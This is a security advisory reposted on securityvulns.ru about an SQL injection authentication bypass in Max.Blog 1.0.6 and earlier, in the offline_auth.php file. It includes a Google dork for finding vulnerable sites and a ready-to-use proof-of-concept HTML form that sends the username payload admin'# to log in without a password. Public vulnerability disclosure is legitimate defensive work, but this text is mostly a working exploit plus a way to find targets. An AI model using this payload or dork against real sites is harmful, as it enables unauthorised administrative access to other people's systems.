Computer Security

Security Advisory: Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [SECURITY] [DSA 1711-1] New TYPO3 packages fix remote code execution

  SAP NetWeaver XSS Vulnerability

  [HACKATTACK Advisory 25012009]ConPresso CMS 4.07 - Session Fixation, XFS, XSS

  Lootan(kedor)
Sql Injection vulnerability

From:Salvatore "drosophila" Fresta <drosophilaxxx_(at)_gmail.com>
Date:01.02.2009
Subject:Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass

###################             Salvatore "drosophila" Fresta    ###################


Application:    Max.Blog
                               http://www.mzbservices.com
Version:                Max.Blog <= 1.0.6
Bug:            * Offline Authentication Bypass
Exploitation:   Remote
Dork:                   intext:"Powered by Max.Blog"
Date:           27 Jan 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:         Salvatore "drosophila" Fresta
                       e-mail: drosophilaxxx@gmail.com
               

############################################################################

- BUGS

Offline Authentication Bypass Exploit:

       Requisites: magic quotes = off

       File affected: offline_auth.php

       This bug allows a guest to bypass an offline authentication service
       using SQL Injection vulnerability.

############################################################################

- CODE

<html>
       <head>
               <title>
                       Salvatore "drosophila" Fresta - Max.Blog <= 1.0.6 Offline
Authentication Bypass Exploit
               </title>
       </head>
       <body>
               <form action="http://www.site.com/path/offline_auth.php" method="POST">
                       <input type="text" name="username" value="admin'#" size="15">
                       <input type="hidden" name="password">
                       <input type="submit" value="Go!">
               </form>
       </body>
</html>

############################################################################

--
Salvatore "drosophila" Fresta
CWNP444351
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server